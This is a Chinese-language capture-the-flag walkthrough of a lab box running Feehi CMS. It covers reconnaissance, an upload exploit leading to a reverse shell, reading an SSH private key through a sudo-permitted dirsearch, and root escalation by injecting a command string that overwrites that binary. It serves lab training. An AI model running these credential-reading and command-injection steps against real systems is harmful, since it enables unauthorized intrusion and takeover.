Search

靶机说明

QQ群：660930334

一、信息收集

1、主机探测

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-16 11:29 CST
Nmap scan report for 192.168.2.1
Host is up (0.00017s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00014s latency).
MAC Address: 08:00:27:59:EA:A8 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.26
Host is up (0.00047s latency).
MAC Address: 08:00:27:78:61:17 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.05 seconds

靶机IP：192.168.2.26

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.26                                 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-16 11:29 CST
Nmap scan report for 192.168.2.26
Host is up (0.00032s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:78:61:17 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 2.58 seconds

开放端口：22、80

2.详细信息扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.26
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-16 11:30 CST
Nmap scan report for 192.168.2.26
Host is up (0.00029s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Feehi CMS
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 08:00:27:78:61:17 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.66 seconds

3.udp扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.26                    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-16 11:30 CST
Nmap scan report for 192.168.2.26
Host is up (0.00048s latency).
All 100 scanned ports on 192.168.2.26 are in ignored states.
Not shown: 59 closed udp ports (port-unreach), 41 open|filtered udp ports (no-response)
MAC Address: 08:00:27:78:61:17 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 57.00 seconds

二、WEB渗透

访问80端口，发现是一个Feehi CMS

1、目录扫描

┌──(root㉿kali)-[~/miaosec]
└─# gobuster dir -u http://192.168.2.26 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak,md,db,js
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.26
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              bak,md,db,js,php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 277]
/.html                (Status: 403) [Size: 277]
/index                (Status: 200) [Size: 80684]
/index.php            (Status: 200) [Size: 80676]
/uploads              (Status: 301) [Size: 314] [--> http://192.168.2.26/uploads/]
/admin                (Status: 301) [Size: 312] [--> http://192.168.2.26/admin/]
/static               (Status: 301) [Size: 313] [--> http://192.168.2.26/static/]
/assets               (Status: 301) [Size: 313] [--> http://192.168.2.26/assets/]
/php                  (Status: 200) [Size: 58255]
/java                 (Status: 200) [Size: 64546]
/install.php          (Status: 200) [Size: 94]
/api                  (Status: 301) [Size: 310] [--> http://192.168.2.26/api/]
/javascript           (Status: 200) [Size: 62968]
/Java                 (Status: 200) [Size: 64546]
/robots.txt           (Status: 200) [Size: 25]
/setup.txt            (Status: 200) [Size: 18]
/JavaScript           (Status: 200) [Size: 62968]
/PHP                  (Status: 200) [Size: 58255]
Progress: 44313 / 1764488 (2.51%)^C

查看setup.txt，找到用户名和密码admin:MazeSec2025

三、Feehi CMS漏洞利用

https://www.exploit-db.com/exploits/51018

利用步骤：

使用admin账号登录后台http://ip/admin
转到运营管理-广告管理
创建新广告
上传扩展名为 jpg/png 的 php 脚本，然后使用 Burp 将扩展名改回 php。
访问shell，复制图像的链接，修改ip后进行访问

四、获取www-data权限

┌──(root㉿kali)-[~]
└─# nc -lvnp 4444 
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.26] 48214
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

稳定shell

script /dev/null -c bash
# 按下 Ctrl+Z 将其挂起
stty raw -echo; fg
# 按下回车
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 24 columns 80

五、权限提升

1、获取7r1umphk权限

查看sudo -l

www-data@Search:/tmp$ sudo -l
Matching Defaults entries for www-data on Search:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on Search:
    (7r1umphk) NOPASSWD: /usr/local/bin/dirsearch

可以无密码，以7r1umphk用户权限执行/usr/local/bin/dirsearch

dirsearch可以使用参数-l读取文件

先读取看看有没有7r1umphk的公钥

www-data@Search:/tmp$ sudo -u 7r1umphk /usr/local/bin/dirsearch -l /home/7r1umphk/.ssh/authorized_keys

  _|. _ _  _  _  _ _|_    v0.4.3.post1
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /tmp/reports/_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIH2uUbVOyxF8xzVaY+wqMcubDBUbS6Ri8priYyRiyZbI 7r1umphk@Search/_25-12-16_10-26-45.txt
Traceback (most recent call last):
  File "/usr/local/bin/dirsearch", line 8, in <module>
    sys.exit(main())
  File "/usr/local/lib/python3.9/dist-packages/dirsearch/dirsearch.py", line 67, in main
    Controller()
  File "/usr/local/lib/python3.9/dist-packages/dirsearch/lib/controller/controller.py", line 79, in __init__
    self.run()
  File "/usr/local/lib/python3.9/dist-packages/dirsearch/lib/controller/controller.py", line 212, in run
    self.set_target(url)
  File "/usr/local/lib/python3.9/dist-packages/dirsearch/lib/controller/controller.py", line 289, in set_target
    cred, parsed.netloc = parsed.netloc.split("@")
AttributeError: can't set attribute

直接读取私钥

www-data@Search:/tmp$ sudo -u 7r1umphk /usr/local/bin/dirsearch -l /home/7r1umphk/.ssh/id_ed25519     

  _|. _ _  _  _  _ _|_    v0.4.3.post1
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /tmp/reports/BATCH-25-12-16_10-28-21/BATCH.txt

Target: http://-----BEGIN OPENSSH PRIVATE KEY-----/

[10:28:21] Starting: 

There was a problem in the request to: http://-----BEGIN%20OPENSSH%20PRIVATE%20KEY-----/

Target: http://b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW/

[10:28:21] Starting: 

There was a problem in the request to: http://b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW/

Target: http://QyNTUxOQAAACB9rlG1TssRfMc1WmPsKjHLmwwVG0ukYvKa4mMkYsmWyAAAAJg+y+ADPsvg/

[10:28:21] Starting: 

There was a problem in the request to: http://QyNTUxOQAAACB9rlG1TssRfMc1WmPsKjHLmwwVG0ukYvKa4mMkYsmWyAAAAJg+y+ADPsvg/

Target: http://AwAAAAtzc2gtZWQyNTUxOQAAACB9rlG1TssRfMc1WmPsKjHLmwwVG0ukYvKa4mMkYsmWyA/

[10:28:21] Starting: 

There was a problem in the request to: http://AwAAAAtzc2gtZWQyNTUxOQAAACB9rlG1TssRfMc1WmPsKjHLmwwVG0ukYvKa4mMkYsmWyA/

Target: http://AAAECPxip0hGT4O48HAkEWglmNjSaDrr8tXi1W+inEP7eAS32uUbVOyxF8xzVaY+wqMcub/

[10:28:21] Starting: 

There was a problem in the request to: http://AAAECPxip0hGT4O48HAkEWglmNjSaDrr8tXi1W+inEP7eAS32uUbVOyxF8xzVaY+wqMcub/

Target: http://DBUbS6Ri8priYyRiyZbIAAAADzdyMXVtcGhrQFNlYXJjaAECAwQFBg==/

[10:28:21] Starting: 

There was a problem in the request to: http://DBUbS6Ri8priYyRiyZbIAAAADzdyMXVtcGhrQFNlYXJjaAECAwQFBg==/

Target: http://-----END OPENSSH PRIVATE KEY-----/

[10:28:21] Starting: 

There was a problem in the request to: http://-----END%20OPENSSH%20PRIVATE%20KEY-----/

Task Completed

直接使用ai，提取出私钥

进行登录

┌──(root㉿kali)-[/tmp]
└─# ssh 7r1umphk@192.168.2.26 -i id
7r1umphk@Search:~$ id
uid=1000(7r1umphk) gid=1000(7r1umphk) groups=1000(7r1umphk)

2、获取root权限

查看sudo -l

7r1umphk@Search:/tmp$ sudo -l
Matching Defaults entries for 7r1umphk on Search:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User 7r1umphk may run the following commands on Search:
    (root) NOPASSWD: /usr/local/bin/dirsearch

也是dirsearch

构造sudo+可执⾏命令提权

用sudo覆写掉dirsearch就好了，但还是那句话，必须要有命中才会有输出文件，这下去自己的kali上创建一个文件，然后开http服务就好

┌──(root㉿kali)-[/tmp]
└─# touch '123;id;su;whoami'

┌──(root㉿kali)-[/tmp]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

7r1umphk@Search:/tmp$ echo '123;id;su;whoami' > miao
7r1umphk@Search:/tmp$ sudo dirsearch -u http://192.168.2.4 -w ./miao -o /usr/local/bin/dirsearch

  _|. _ _  _  _  _ _|_    v0.4.3.post1
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 1

Output File: /usr/local/bin/dirsearch

Target: http://192.168.2.4/

[10:58:00] Starting: 
[10:58:00] 200 -    0B  - /123;id;su;whoami

Task Completed

查看/usr/local/bin/dirsearch

7r1umphk@Search:/tmp$ cat /usr/local/bin/dirsearch 
# Dirsearch started Tue Dec 16 10:58:00 2025 as: /usr/local/bin/dirsearch -u http://192.168.2.4 -w ./miao -o /usr/local/bin/dirsearch

200     0B   http://192.168.2.4/123;id;su;whoami

直接执行/usr/local/bin/dirsearch

7r1umphk@Search:/tmp$ sudo /usr/local/bin/dirsearch 
/usr/local/bin/dirsearch: 3: /usr/local/bin/dirsearch: 200: not found
uid=0(root) gid=0(root) groups=0(root)
root@Search:/tmp# id
uid=0(root) gid=0(root) groups=0(root)

六、获取FLAG

1
2
3

root@Search:~# cat 499f7ecdb8434a7a962b9d5c6d88edce.txt  /home/7r1umphk/user.txt 
flag{root-499f7ecdb8434a7a962b9d5c6d88edce}
flag{user-681db772f6844d4c84da083c3d280954}

Maze-sec

#cms-feehi #sudo-dirsearch

http://miao-sec.github.io/Maze-sec/Search/

作者

Miao

发布于

2026年1月9日

许可协议

BY-MIAO

Motto 上一篇

React 下一篇